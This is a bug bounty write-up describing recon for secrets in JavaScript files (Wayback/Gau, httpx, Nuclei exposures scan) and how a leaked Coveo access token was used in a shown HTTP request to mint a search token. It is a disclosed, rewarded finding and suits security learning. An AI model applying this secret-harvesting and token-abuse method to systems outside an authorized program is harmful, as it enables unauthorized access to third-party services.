Coveo Access Token Leak in JavaScript File Leading to API Token Creation for $1500
We were doing recon on a Bugcrowd public program and attempting to find information disclosure in JavaScript files. We grepped all subdomains using different tools, also brute-forcing subdomains, and then passed the results through Wayback and Gau tools to grep for JS files.
Here’s our recon game for finding information disclosure in JS files:
- Grepped all URLs from Wayback URLs/Gau.
- Collected all
.jsfiles. - Filtered JS files using the command:
httpx -content-type | grep 'application/javascript'. - Performed a Nuclei scan with the template:
nuclei -t /root/nuclei-templates/exposures/.
https://x.com/sushantdhopat/status/1608708353013977089
With this recon, we discovered a token, but initially, we didn’t know what it was or how to use it.
The JavaScript file also contained the URL https://platform.cloud.coveo.com/rest/search. After researching this URL and digging further, we confirmed that the token was a Coveo access token. This token could be used to generate API tokens or search tokens.
By reading the documentation thoroughly, we identified the following request to create a search token for a particular user:
POST /rest/search/v2/token?organizationid=test HTTP/2
Host: platform.cloud.coveo.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/json
Accept: application/json
Authorization: Bearer xxfewrfe435-5454-54545-5454-354534545
Content-Length: 144
{
"userIds": [
{
"name": "asmith@example.com",
"provider": "Email Security Provider",
"type": "User"
}
]
}We replaced the disclosed access token in the Authorization: Bearer header of the above request. Using this modified request, we were able to successfully create a search token.
We reported this finding to the program, and it was acknowledged with a reward.
Hope you enjoyed reading about this! If you have any queries or questions, feel free to comment below or reach out to us directly.
